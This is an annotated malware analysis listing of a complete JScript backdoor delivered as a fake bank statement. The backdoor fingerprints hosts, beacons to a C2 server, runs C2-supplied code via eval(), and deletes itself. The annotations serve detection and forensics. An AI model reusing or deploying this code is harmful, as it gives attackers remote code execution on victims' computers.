// Bank Statement James Fifeman.xls
// C2: hxxps://msdn-update[.]com/
// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1
function anonymous() {
  // NOTE(review): the whole sample sits inside one `anonymous` function that is
  // neither called nor returned in this listing. That is the shape of a body
  // handed to `new Function(...)` by a loader that lives outside this page —
  // presumably, cannot be confirmed from here. Everything below runs under
  // Windows Script Host (WScript, ActiveXObject, GetObject, Enumerator).
  //
  // String constants. The identifiers are randomised; only the literal values
  // matter, and they are the useful static indicators of this sample (C2 host,
  // URL path words, POST field names, COM ProgIDs, WMI namespace, User-Agent).
  // Several constants are never referenced; they are marked "unused".
  var zbegbiwhuhro = "&id=";                      // query fragment before the host id (see send_data)
  var ihebgysipc = "fetch";                       // URL directory word (see get_path)
  var yfusrihyny = "";                            // unused
  var tindajrurke = "get_image";                  // URL file word (see get_path)
  var ytysqyprozlibx = "string";                  // unused (vimkiwono is the one used)
  var otocywviso = "no";                          // sentinel returned by send_data on any failure
  var otbybimollu = "Unknown";                    // fallback host name in id()
  var evaritpequx = "Scripting.FileSystemObject"; // COM ProgID, used for self-deletion
  var yqpawymfikorh = "_";                        // separator / replacement character in id()
  var koficijojhi = "/";                          // path separator in get_path
  var inoxhegzajw = "action=get_command";         // tasking request sent by main()
  var ihunuxfip = "request";                      // unused (ucmomadgib is the one used)
  var edomsecejso = "z";                          // upper bound for "allowed" host-name characters in id()
  var lwilpotasvo = "create_logo";                // URL file word (see get_path)
  var vimkiwono = "string";                       // typeof comparison value in id()
  var pidwagunit = "%APPDATA%";                   // expanded at start-up
  var gqyxqohoftupi = "winmgmts:root/CIMV2";      // WMI namespace for the network-adapter query
  var erzirolonje = "create_image";               // URL file word (see get_path)
  var esajigfown = "decrypt";                     // crypt_controller mode
  var ewypetevhu = "?request=page";               // query string of the tasking request
  var bgixmabefzaqnu = "show_ico";                // URL file word (see get_path)
  var huzzakrowopvu = "";                         // unused
  var zexygrogy = "";                             // unused
  var iwpodhexzubc = "images";                    // URL directory word (see get_path)
  var bbymyruztovpi = "WScript.Shell";            // COM ProgID, used to expand %APPDATA%
  var xaprislyhbulf = "show_jpg";                 // URL file word (see get_path)
  var inbypzethezag = "&";                        // form-field separator
  var ucmomadgib = "request";                     // send_data "type" meaning "tasking request"
  // Fixed campaign/group tag with a hard-coded shared secret; sent (XOR-obfuscated)
  // in every tasking request. "time=120000" matches the sleep interval in main().
  var vjiwumhojarse = "group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=";
  var cedlihrijalti = "?request=content&id=";     // query string of the result-upload request
  var kyppaltuwti = "image";                      // URL directory word (see get_path)
  var ejogamygpu = "MSXML2.ServerXMLHTTP";        // COM ProgID used for all HTTP traffic
  var cylofalpitx = "content";                    // URL directory word (see get_path)
  var fifuwacdez = "encrypt";                     // crypt_controller mode
  var atkudecaxme = "decrypt";                    // unused
  var obawufdoxsa = "";                           // empty string; used as split/join separator
  var bhomnismictu = "encrypt";                   // unused
  var ocsekeltan = "show_png";                    // URL file word (see get_path)
  var vivijsozvali = "User-Agent";                // HTTP header name
  var yracypcamos = "no";                         // unused
  var kexerobi = "cdn";                           // URL directory word (see get_path)
  var inamvagtixjyxj = "POST";                    // HTTP method for every request
  var usubhejreva = "_";                          // unused
  var jaxylibpafl = "";                           // unused
  var hbanamyklujt = "";                          // unused
  var bvaxoqwetmodg = "agyjabam=";                // POST form-field name carrying the obfuscated blob
  var ditevnaqa = "https://msdn-update.com/";     // C2 base URL
  var wegmexxabha = "POST";                       // unused
  var dnanehmufride = "encrypt";                  // unused
  var fypalygos = "application/x-www-form-urlencoded"; // Content-Type value
  var urmuqizemz = "Content-Type";                // HTTP header name

  // Builds the victim identifier "<mac>_<hostname>" from the first IP-enabled
  // network adapter returned by WMI (Win32_NetworkAdapterConfiguration).
  // Uses the file-level `wmi` object created at start-up. Returns undefined when
  // no adapter has a usable MAC address.
  function id() {
    var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
    var lItems = new Enumerator(lrequest);
    for (; !lItems.atEnd(); lItems.moveNext()) {
      var mac = lItems.item().macaddress;
      var dns_hostname = lItems.item().DNSHostName;
      if (typeof mac === vimkiwono && mac.length > 1) {
        // NOTE(review): when DNSHostName is null/undefined, `typeof` is not
        // "string" and the `.length` access here throws before the "Unknown"
        // fallback is reached; the exception propagates to send_data's catch
        // and the beacon for that cycle is reported as "no".
        if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {
          dns_hostname = otbybimollu;
        } else {
          // Replace every character that sorts above "z" (i.e. non-ASCII or
          // other high code units) with "_", one character at a time.
          for (var i = 0; i < dns_hostname.length; i++) {
            if (dns_hostname.charAt(i) > edomsecejso) {
              dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);
            }
          }
        }
        return mac + yqpawymfikorh + dns_hostname;
      }
    }
  }

  // Reversible transport obfuscation used for both directions of C2 traffic.
  // type === "decrypt": `request` is "<xor-bytes>)*(<key>" run through escape();
  //   the key is recovered from the same message, so anyone holding the
  //   traffic can decode it — this is obfuscation, not encryption.
  // any other type (the caller passes "encrypt"): a fresh 4-digit numeric key
  //   (1000..9999) is drawn from Math.random, `request` is converted to its
  //   UTF-8 byte string, XORed with the key digits, and the key is appended
  //   after the ")*(" separator before escape().
  // Returns the transformed string. In decrypt mode a message without ")*("
  // leaves request_split[1] undefined and the `.split` call throws; main()
  // swallows that.
  function crypt_controller(type, request) {
    var encryption_key = obawufdoxsa;
    if (type === esajigfown) {
      request = unescape(request);
      var request_split = request.split(")*(");
      request = request_split[0];
      encryption_key = request_split[1].split(obawufdoxsa); // key as an array of digit characters
    } else {
      encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);
      request = unescape(encodeURIComponent(request)); // JS string -> UTF-8 byte string
    }
    var output = new Array(request.length);
    for (var i = 0; i < request.length; i++) {
      // Repeating-key XOR; key characters are ASCII digits, so only the low
      // bits of each byte change.
      var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
      output[i] = String.fromCharCode(charCode);
    }
    var result_string = output.join(obawufdoxsa);
    if (type === fifuwacdez) {
      result_string = result_string + ")*(" + encryption_key.join(obawufdoxsa); // key travels in the clear
      result_string = escape(result_string);
    }
    return result_string;
  }

  // Picks a random C2 URL of the form
  //   https://msdn-update.com/<dir>/<file>
  // with <dir> from 5 words and <file> from 6 words (30 combinations). The
  // path words are chosen to look like image/CDN resources; the full word
  // lists below are the network indicator to match on.
  function get_path() {
    var pathes = [iwpodhexzubc, kyppaltuwti, cylofalpitx, ihebgysipc, kexerobi];
    var files = [lwilpotasvo, tindajrurke, erzirolonje, bgixmabefzaqnu, ocsekeltan, xaprislyhbulf];
    var path = pathes[Math.floor(Math.random() * pathes.length)] + koficijojhi + files[Math.floor(Math.random() * files.length)];
    return ditevnaqa + path;
  }

  // Sends one synchronous HTTPS POST to the C2 via MSXML2.ServerXMLHTTP.
  // type === "request": tasking beacon to "<path>?request=page"; the body is
  //   "agyjabam=" + encrypt(group tag + uid + "&id=" + victim id + "&" + data).
  // otherwise: result upload to "<path>?request=content&id=<uid>"; `data` is
  //   obfuscated only when `crypt` is truthy.
  // Returns the response body, or "no" on any exception (COM failure, network
  // error, or an exception thrown by id()/crypt_controller). Uses the
  // file-level `uniq_id`.
  function send_data(type, data, crypt) {
    try {
      var http_object = new ActiveXObject(ejogamygpu);
      if (type === ucmomadgib) {
        http_object.open(inamvagtixjyxj, get_path() + ewypetevhu, false); // false = synchronous
        data = bvaxoqwetmodg + crypt_controller(fifuwacdez, vjiwumhojarse + uniq_id + zbegbiwhuhro + id() + inbypzethezag + data);
      } else {
        http_object.open(inamvagtixjyxj, get_path() + cedlihrijalti + uniq_id, false);
        if (crypt) {
          data = crypt_controller(fifuwacdez, data);
        }
      }
      // Spoofed browser UA. Note the internal inconsistency (rv:58.0 paired with
      // Firefox/50.0), which makes the exact string a usable detection signature.
      http_object.setRequestHeader(vivijsozvali, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
      http_object.setRequestHeader(urmuqizemz, fypalygos);
      // ServerXMLHTTP option 2 is the ignore-server-certificate-errors option and
      // 13056 is the documented "ignore all certificate errors" mask, so an
      // invalid or self-signed C2 certificate does not stop the beacon.
      http_object.setOption(2, 13056);
      http_object.send(data);
      return http_object.responseText;
    } catch (e) {
      return otocywviso;
    }
  }

  // Beacon loop: request tasking, execute whatever comes back, sleep, repeat.
  // The decoded response is passed straight to eval(), i.e. the C2 has
  // arbitrary code execution in this script's context; any error in the task
  // is silently discarded by the empty catch. Sleep is 120000 ms plus a jitter
  // of -5000..+11000 ms (115..131 s between beacons). The loop is implemented
  // by unconditional recursion, so each cycle adds a stack frame and the
  // process likely dies with a stack-overflow error after enough iterations
  // rather than running indefinitely.
  function main() {
    var ncommand = obawufdoxsa;
    ncommand = send_data(ucmomadgib, inoxhegzajw, true);
    if (ncommand !== otocywviso) {
      try {
        eval(crypt_controller(esajigfown, ncommand)); // remote code execution from C2 response
      } catch (e) {}
    }
    var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
    WScript.Sleep(random_knock);
    main();
  }

  // Start-up. Function declarations above are hoisted, so `wmi` and `uniq_id`
  // are assigned here before any call reaches them.
  var first = false;                                      // unused
  var shell = new ActiveXObject(bbymyruztovpi);           // WScript.Shell
  var fso = new ActiveXObject(evaritpequx);               // Scripting.FileSystemObject
  var wmi = GetObject(gqyxqohoftupi);                     // winmgmts:root/CIMV2, used by id()
  // "Unique" session id is only the current UTC millisecond (0..999); it is
  // sent as "uid" in every beacon and is not actually unique across victims.
  var uniq_id = new Date().getUTCMilliseconds();
  var app_path = shell.expandEnvironmentStrings(pidwagunit);
  // GetFolder(...).Type is the folder's type description string; the check
  // passes for any ordinary folder whose description is longer than five
  // characters, which is presumably always the case for %APPDATA% — it reads
  // like a weak sandbox/environment check. If GetFolder throws, nothing here
  // catches it and the script exits before beaconing.
  if (fso.GetFolder(app_path).Type.length > 5) {
    // Deletes its own script file while continuing to run in memory, so the
    // on-disk artifact is gone once the beacon loop starts (forensics: look for
    // the running wscript/cscript process and its command line, not the file).
    fso.deleteFile(WScript.ScriptFullName);
    try {
      WScript.Sleep(120000); // initial 120 s delay before the first beacon
      main();
    } catch (e) {
      // Any failure (including main() eventually overflowing the stack) restarts
      // the loop once; a second failure propagates and ends the script.
      main();
    }
  }
}